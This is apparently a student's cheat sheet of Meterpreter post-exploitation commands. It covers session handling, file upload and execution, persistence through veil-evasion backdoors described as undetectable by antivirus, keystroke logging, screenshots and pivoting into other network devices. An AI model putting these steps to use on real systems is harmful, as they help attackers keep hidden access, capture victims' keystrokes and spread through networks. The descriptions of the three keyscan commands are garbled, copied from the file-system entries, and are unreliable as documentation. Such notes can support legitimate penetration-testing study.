Post Exploitation

Meterpreter Basics

  • help - shows help

  • background - backgrounds current session

  • sessions -l - list all sessions

  • sessions -i - interact with a certain session

  • sysinfo - display system info

  • ipconfig - displays infor about interfaces

  • getuid - shows current user

File System Commands

  • pwd - shows current working directory

  • ls - list files in current working directory

  • cd [location] - changes working directory

  • cat [file] - prints the content of file on screen

  • download [file] - downloads file

  • upload [file] - uploads file

  • execute -f [file] - executes file

Maintaining Access

  • Using a veil-evasion

    • rev_http_service

    • rev_tcp_service

    • Use it instead of a normal backdoor

    • Or upload and execute from meterpreter

    • Does not always work

  • Using persistence module

    • run persistence -h

    • Detectable by antivirus programs

  • Using metasploit + veil-evasion = more rubust + undetectable by antivirus

    • use exploit/windows/local/persistence

    • set session [session id]

    • set exe::custom [backdoor location]

    • exploit

Key Logging

  • Log all mouse/keyboard events

    • keyscan_start - shows current working directory

    • keyscan_dump - lists files in the current working directory

    • keyscan_stop - changes working directory to location

    • screenshot

Pivoting

  • Use the hacked device as a pivot

  • Try to gain access to other devices in the network